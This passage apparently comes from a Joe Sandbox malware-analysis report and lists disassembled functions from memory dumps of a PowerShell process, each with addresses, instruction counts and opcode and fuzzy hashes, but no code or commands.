                                                  • Instruction ID: 06aec4bdce76e371c2bc8c738fe4faefe47dd4c6b67cd56c1605d4739901b993
                                                  • Opcode Fuzzy Hash: f4e6b616e7cfd04ce0fcfe5e9b88a3e867d066f1f82894558c5957e4d34cddb9
                                                  • Instruction Fuzzy Hash: FA8127B5B012169FDF159B7984002BABBE1AFC5211F24807ADA679B347EB31CD42C7E1
                                                  Function 076FFAD0 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: G2l$G2l
                                                  • API String ID: 0-2463336331
                                                  • Opcode ID: f8dff9d428875674e00fbe29d494527187ae146836812744989550ec64fdea3b
                                                  • Instruction ID: c3ae3041814169e1b5d3a535e51d1629c70f1b51fbbef1556e4158e2145c9554
                                                  • Opcode Fuzzy Hash: f8dff9d428875674e00fbe29d494527187ae146836812744989550ec64fdea3b
                                                  • Instruction Fuzzy Hash: E14116F1B0021A8BCB645A7884112BFB7E6ABC5751F14887ADB17DB381EE35D842CB91
                                                  Function 076F4666 Relevance: 2.0, Strings: 1, Instructions: 755COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (.#k
                                                  • API String ID: 0-316210326
                                                  • Opcode ID: 3527eff1f3a511c30723986706d3a3cdc26040e1f845947fa9bfa5a43e8ee087
                                                  • Instruction ID: 140e87354197f16a39f1c923292034a87dba72f1dd9276828078a4c80ead34bd
                                                  • Opcode Fuzzy Hash: 3527eff1f3a511c30723986706d3a3cdc26040e1f845947fa9bfa5a43e8ee087
                                                  • Instruction Fuzzy Hash: B9626CB4A00249DFDB14CB98C484FADBBF2EB85714F148569DA066F795CB76AC81CF40
                                                  Function 076F4725 Relevance: 1.9, Strings: 1, Instructions: 673COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (.#k
                                                  • API String ID: 0-316210326
                                                  • Opcode ID: b672ac0e2862aaceaed5c65652dec39e770f88cae971643e148451a62ebebd73
                                                  • Instruction ID: ff44fc6691c62b6112db72c43c244dc2298a7b85355ee0d0b44820b9dc4551dd
                                                  • Opcode Fuzzy Hash: b672ac0e2862aaceaed5c65652dec39e770f88cae971643e148451a62ebebd73
                                                  • Instruction Fuzzy Hash: 49525BB4A00249DFDB14CB98C484F6DBBF2EB85714F1484A9DA166F795CBB6AC81CF40
                                                  Function 076F1040 Relevance: 1.7, Strings: 1, Instructions: 499COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (.#k
                                                  • API String ID: 0-316210326
                                                  • Opcode ID: 6f9cc06a557d42591f3726577a643d90e167b9e4bc282230d7ee1282cc4ada7d
                                                  • Instruction ID: 31212739725a3bc4e02862a4da63474a1c04781ef910c2a685abae31d0927c34
                                                  • Opcode Fuzzy Hash: 6f9cc06a557d42591f3726577a643d90e167b9e4bc282230d7ee1282cc4ada7d
                                                  • Instruction Fuzzy Hash: 061274B4B01209DFDB18CB68C441A6AFBF2FB86354F14C46AEA169B355CB72DC42CB51
                                                  Function 04D9D248 Relevance: .7, Instructions: 702COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2176cd5eb87d9da66e46aca83f6fdd40dbce2805f93d5c19ae49078044620af7
                                                  • Instruction ID: 67b6308cdec020f15a96adf1ae48d99101ffdb358432d05ea7dc30d4d39ef71f
                                                  • Opcode Fuzzy Hash: 2176cd5eb87d9da66e46aca83f6fdd40dbce2805f93d5c19ae49078044620af7
                                                  • Instruction Fuzzy Hash: A6521675A012589FCF15CF98C484AADBBF2BF88314F288559E849EB355C735ED81CB90
                                                  Function 04D94310 Relevance: .6, Instructions: 623COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e18f6edddde0e5aaa6d9f2ead3ef787b6ee96a657b1cfc2d208be461324712ac
                                                  • Instruction ID: dd8b36b8f14934701c7588e176ea4aecb6d0a5f9768ef803d7678a2671a14abd
                                                  • Opcode Fuzzy Hash: e18f6edddde0e5aaa6d9f2ead3ef787b6ee96a657b1cfc2d208be461324712ac
                                                  • Instruction Fuzzy Hash: DF421674A052589FCF15DFA8D484AADBBF2BF88314F248159E804EB356C731ED82CB90
                                                  Function 04D9F4E8 Relevance: .4, Instructions: 442COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be07b35c301a4040b64a64e0277603d276ce1e4b8d9655e2bf17f388fb6663bc
                                                  • Instruction ID: 789fc57488f24ca53fb09e20ab98df3991a64ff1336931af02f87e7638f87a4f
                                                  • Opcode Fuzzy Hash: be07b35c301a4040b64a64e0277603d276ce1e4b8d9655e2bf17f388fb6663bc
                                                  • Instruction Fuzzy Hash: F7120675A01219AFCF45CF98C484AAEBBF2BF88314F248559E845EB365C735ED81CB90
                                                  Function 04D9E560 Relevance: .4, Instructions: 432COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec3544434b334ae19701d2bbfc32c6bf9ddb4bd679fa077672b2166e331d7ca7
                                                  • Instruction ID: 790fa588e4e7686d39686a827575795c26345b4b5e4efb1469f4bcd3397000f0
                                                  • Opcode Fuzzy Hash: ec3544434b334ae19701d2bbfc32c6bf9ddb4bd679fa077672b2166e331d7ca7
                                                  • Instruction Fuzzy Hash: 05020735A012189FCF15CF98D484AAEBBF2BF89314F248559E805EB3A5D731ED41CB90
                                                  Function 04D9EF28 Relevance: .4, Instructions: 431COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e310b79716b0c2c7c970eca4a01b237b4ccdc933ac5d1a44d2f534a58b2e3d68
                                                  • Instruction ID: a02fc11a9b4e90dfbed7311eb4957c96d74e3fea7da7f04599cb9bd0e3a12f11
                                                  • Opcode Fuzzy Hash: e310b79716b0c2c7c970eca4a01b237b4ccdc933ac5d1a44d2f534a58b2e3d68
                                                  • Instruction Fuzzy Hash: 9402F635A01219AFCF05CF98D884AAEBBF2BF88314F248559E945EB365C731ED41CB90
                                                  Function 04D93528 Relevance: .4, Instructions: 409COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8323983837f1bbf1d270d16bf806d3546d353e00b7d0a212e2bd741d602d918b
                                                  • Instruction ID: fa526fdf37eb8aac1f9f87f1c1403e82ce9177d60d15ca3fa1b9b7aa13e494fd
                                                  • Opcode Fuzzy Hash: 8323983837f1bbf1d270d16bf806d3546d353e00b7d0a212e2bd741d602d918b
                                                  • Instruction Fuzzy Hash: 82F15B75A05258AFCB05CFA8C490A9DBFF2BF89314F15819AE845EB352C731ED85CB90
                                                  Function 04D95740 Relevance: .3, Instructions: 349COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4032f0960abca084f13f2a31c418c0e41515153e5c29ec3caa27da855563e793
                                                  • Instruction ID: 23a55fc3357fc7e4b2edfcced700f52cbcb4264ed6af5052bf2a2855d15ac210
                                                  • Opcode Fuzzy Hash: 4032f0960abca084f13f2a31c418c0e41515153e5c29ec3caa27da855563e793
                                                  • Instruction Fuzzy Hash: FBE10835A01219EFCB05CF98D494AADBBF2FF49314F288569E805AB355C731ED82CB90
                                                  Function 04D98E3C Relevance: .3, Instructions: 288COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e295eb6b795f97df3bc5409b01856e464c8dc5a0e61910ad2ddbcaa96f247b66
                                                  • Instruction ID: 1bdf0835e189a686225fa65b99e3058e02c34b94823dd25f9e6ca82fda68d975
                                                  • Opcode Fuzzy Hash: e295eb6b795f97df3bc5409b01856e464c8dc5a0e61910ad2ddbcaa96f247b66
                                                  • Instruction Fuzzy Hash: 9CB19A70E102099FDF10DFA8C89979EBBF2BF49714F148529E414FB294EB34A885CB91
                                                  Function 04D9856C Relevance: .3, Instructions: 275COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b59d35cb19659c856298d4017592e2c8a6d2f0c00bb2cca6cc51fd434881a67f
                                                  • Instruction ID: 3474c1bf1ef00ac2e4f3e777292dcb4944765fac6964aa9911d9d16c22654b4f
                                                  • Opcode Fuzzy Hash: b59d35cb19659c856298d4017592e2c8a6d2f0c00bb2cca6cc51fd434881a67f
                                                  • Instruction Fuzzy Hash: D8B16970E102098FDF10EFA9D88479EBBF1BF49B44F148529E815EB294EB34A845DB91
                                                  Function 04D941EF Relevance: .2, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b7420ff7a0b4b4de6e3e957fd40c32c9991be0a6fba8de48b7aa861f4e1ce3c
                                                  • Instruction ID: 3d281a40c9f15abd1811e3ce3447872e924fb2af069cf4a2dd307d677d0cd3c9
                                                  • Opcode Fuzzy Hash: 5b7420ff7a0b4b4de6e3e957fd40c32c9991be0a6fba8de48b7aa861f4e1ce3c
                                                  • Instruction Fuzzy Hash: 9E61277190F7D55FCB179B39886049ABFB0AF4721471A41CBD0C2CB1A3DA25AD09C7B2
                                                  Function 04D9EE87 Relevance: .2, Instructions: 187COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91b33a4e34f66b796c8d76b0d2fadb61446dd911f520903633dee4eb7bcf242f
                                                  • Instruction ID: 415b932bf3aa4e802a94489702a6321b5f6b27d66db62e9d6e9da690fc8a4508
                                                  • Opcode Fuzzy Hash: 91b33a4e34f66b796c8d76b0d2fadb61446dd911f520903633dee4eb7bcf242f
                                                  • Instruction Fuzzy Hash: 25617030A052459FCB06CF68C890AEABFF1FF49314F25859AE545DB3A2D735AC45CB90
                                                  Function 04D9E510 Relevance: .2, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ee3b6e735830853bbbc4fe2c64abcf362963404bea98556a632c6a066eeee60
                                                  • Instruction ID: 82d594a4dbf49dc8eb2f9ecdf1e2127117c2d9a877949ec72a3788c61808f467
                                                  • Opcode Fuzzy Hash: 2ee3b6e735830853bbbc4fe2c64abcf362963404bea98556a632c6a066eeee60
                                                  • Instruction Fuzzy Hash: CD517135A052448FCB56CF5CC994AAEBBF2FF89310B298599E415EB391D331EC41CBA1
                                                  Function 076F0A80 Relevance: .2, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ceeb0b6250bba8214070590382872ef79a8e060052d4fb9af44e2b9c1fc6ca5d
                                                  • Instruction ID: 04425bb3f72eda37e000578b8274593dcb8048c04493fd815667bcf8e8eb1dca
                                                  • Opcode Fuzzy Hash: ceeb0b6250bba8214070590382872ef79a8e060052d4fb9af44e2b9c1fc6ca5d
                                                  • Instruction Fuzzy Hash: 44515BB67053199FCB114A79940176AFBA2AFC6311F14C07BEB56DB383D632C841C7A1
                                                  Function 04D95A47 Relevance: .1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38e2a6327c59e6c03d835b4ab5679aefc2ccc72640f24dcb5a6ba0c3220377df
                                                  • Instruction ID: c1e80615a75b41339e337dd00d6f9ddcd65dda445e5c5e91e0af76657cb56d78
                                                  • Opcode Fuzzy Hash: 38e2a6327c59e6c03d835b4ab5679aefc2ccc72640f24dcb5a6ba0c3220377df
                                                  • Instruction Fuzzy Hash: FD51D735A01219EFDF05CF98D494AADBBF2BF88314F288559E405AB365C735AD82CB90
                                                  Function 04D9F4D7 Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d095c51eee24035e49983c37793d91cdfe8ba01fa3174c0df8807ee1592611b
                                                  • Instruction ID: d940897ac754ec835ed68ab650706fd3d2df30f1954391bc25431777587511aa
                                                  • Opcode Fuzzy Hash: 4d095c51eee24035e49983c37793d91cdfe8ba01fa3174c0df8807ee1592611b
                                                  • Instruction Fuzzy Hash: FD410874A012099FCB55CF98C894AAEBBF2FF88310F248659E915E73A5D335EC41CB90
                                                  Function 076F44D0 Relevance: .1, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5a23052c0ee4de31edc1c3756c83d2fa6630cc7127d804060164a2c0106e464
                                                  • Instruction ID: ca7bfca84a891b3f34b3ce034a6bb071a08daeb18a19fe8658ea1fe721d65dee
                                                  • Opcode Fuzzy Hash: e5a23052c0ee4de31edc1c3756c83d2fa6630cc7127d804060164a2c0106e464
                                                  • Instruction Fuzzy Hash: 82319FB4B00218ABDB04DB64C855FAEBBA3EB84744F508425E902BF3D5CF799C518F91
                                                  Function 04D95692 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2884c7f8745a5e3551f4b9bfe76c405c6d980183f58737fb91559e9ccca139e6
                                                  • Instruction ID: fe65585309f95cedab75f87b9428c2f73652f98ec14acad6a164eddfbcea1422
                                                  • Opcode Fuzzy Hash: 2884c7f8745a5e3551f4b9bfe76c405c6d980183f58737fb91559e9ccca139e6
                                                  • Instruction Fuzzy Hash: 7A31C635A002059FCB06DF59E8909AEBBF2FF89320B2485A9D559EB651C731FD41CB90
                                                  Function 076F0F18 Relevance: .1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 096d8620bb863fa699d22f689b18075663050580cbb009eab49b107865768a27
                                                  • Instruction ID: fe72cdf79735719e2b7fef0741ecf88ee8d174544c94650c664942f4e892134d
                                                  • Opcode Fuzzy Hash: 096d8620bb863fa699d22f689b18075663050580cbb009eab49b107865768a27
                                                  • Instruction Fuzzy Hash: 112129B131620697DB24557A888073BB7DBABC9711F28843AEF479B386CE79D841C361
                                                  Function 076F0DE8 Relevance: .1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48ba498f19ace4cacf1dc9d9446462aed6edba9ee57378643384638617073fa1
                                                  • Instruction ID: e81acc8029b18ea45ff56c358588c4fb61f13979d2ee97a1e4fd8fb810ef780c
                                                  • Opcode Fuzzy Hash: 48ba498f19ace4cacf1dc9d9446462aed6edba9ee57378643384638617073fa1
                                                  • Instruction Fuzzy Hash: C9212CB570031ED7DB64557A8400B3BB7D6ABC9711F24843AE747DB386CE75D8418360
                                                  Function 04D93507 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24642d4a89e8afe5f9217ec99ddacc78dcfc6a8ab03c1764336157388c442570
                                                  • Instruction ID: 095ab3168d814ad377e0bdac75a48b43cecb5c8bdb3a4033658291650e4a9d64
                                                  • Opcode Fuzzy Hash: 24642d4a89e8afe5f9217ec99ddacc78dcfc6a8ab03c1764336157388c442570
                                                  • Instruction Fuzzy Hash: 52313970A002099FCB04CF5DC5849AABBF2FF89310B258299E909EB751C731FC81CB90
                                                  Function 04D95730 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d89a3a6f73932a3bd7534afc61cb5ae379d08d9f89da119b0e0607bbe581ff7
                                                  • Instruction ID: b1bf0d15954274b4c09a735026ecadea88929450e6b27e8583a6171a632a09d9
                                                  • Opcode Fuzzy Hash: 7d89a3a6f73932a3bd7534afc61cb5ae379d08d9f89da119b0e0607bbe581ff7
                                                  • Instruction Fuzzy Hash: 04315A75A002099FCB15CF49D590AAAFBF2FF48310B248669E519EB751C331FD91CBA0
                                                  Function 076F0EFC Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 651904884f974fbcbb3aa98db9bae71c9a432569fb006b252584238c797683ac
                                                  • Instruction ID: 4d4ac818c7c06f62ec424f0aed9185555f773af10a9706075cdc9f46c96731b1
                                                  • Opcode Fuzzy Hash: 651904884f974fbcbb3aa98db9bae71c9a432569fb006b252584238c797683ac
                                                  • Instruction Fuzzy Hash: 64215EF130A385ABDB2105758880B627FE65F82621F1D4067EF46DB383D5799904C361
                                                  Function 076F0DCC Relevance: .1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a458b812b757c6b4bb08fb009c2e282c8c8e4223a2e337bf486ea5cd2f187a0e
                                                  • Instruction ID: 0cedd282cd6087dfbf9b35ccf9eeebfec7c2864b9b855feec832bc0dc9184b16
                                                  • Opcode Fuzzy Hash: a458b812b757c6b4bb08fb009c2e282c8c8e4223a2e337bf486ea5cd2f187a0e
                                                  • Instruction Fuzzy Hash: 35214CF5304359ABDB1106758900736BBE6AF86311F18846BEB469B3C7C679D845C361
                                                  Function 04D9D239 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a1cd64fc02eb363092bbf4ac13fbe4a2f3d14eddfa2c03b5c235f17ff0dd5e4
                                                  • Instruction ID: 5361920e3baeeea641854df34ba018891005057042e72e0709d0fb1c7ee8723f
                                                  • Opcode Fuzzy Hash: 7a1cd64fc02eb363092bbf4ac13fbe4a2f3d14eddfa2c03b5c235f17ff0dd5e4
                                                  • Instruction Fuzzy Hash: 3431E774A006068FCB15CF98C590AA9FBF2FF48310B248699D555EB755C736FC81CB90
                                                  Function 04D946F8 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c2a0e37d0d4a41f88cda578894491748c7a23bcda797f458dd01395ba7d5fc19
                                                  • Instruction ID: 8711097d996bbf46fdb2ffdc551cfe58188ec16523460665089a9981f7297e49
                                                  • Opcode Fuzzy Hash: c2a0e37d0d4a41f88cda578894491748c7a23bcda797f458dd01395ba7d5fc19
                                                  • Instruction Fuzzy Hash: E821E478A006199FCB04CF89C5809AAFBF2FF89310B258569E909E7751C731FD41CBA0
                                                  Function 04D95B54 Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd7cd38100cc4bea14e59ffcb54ac504d5f4738e15e5add61928358f9fd7300b
                                                  • Instruction ID: 4426335673c6329c570d8acd5e720a9dadb5b670f13344836a5dbe7ce1534e59
                                                  • Opcode Fuzzy Hash: dd7cd38100cc4bea14e59ffcb54ac504d5f4738e15e5add61928358f9fd7300b
                                                  • Instruction Fuzzy Hash: 2011D735A01259EFDF46CF98D495A9DBBF2BF48324F288558E405AB361C771EC82CB50
                                                  Function 04D9FC5E Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216288452717.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa06314965f33fcad18e416f24238be2869a6d0e1040d3b849d52684a442e430
                                                  • Instruction ID: a8ac4487076eb3ab4602c1e815c521cde1c1d0c5d5710c7fed8766da36fc8438
                                                  • Opcode Fuzzy Hash: fa06314965f33fcad18e416f24238be2869a6d0e1040d3b849d52684a442e430
                                                  • Instruction Fuzzy Hash: 4101C831A00519AFCF05DB8DD9809AEF7B2FFC8315B648619E915A7254C732AD52CB90
                                                  Function 076FCE88 Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.216295908565.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_76f0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bb82f405075d1d6138300d977a5ae925768b5ffd4f4c4d5caa04f7c1950b12c
                                                  • Instruction ID: e682c3d5b3b508a3951f2ae81d8c99eceefda5ebf55c52d9543373c26f61f2ef
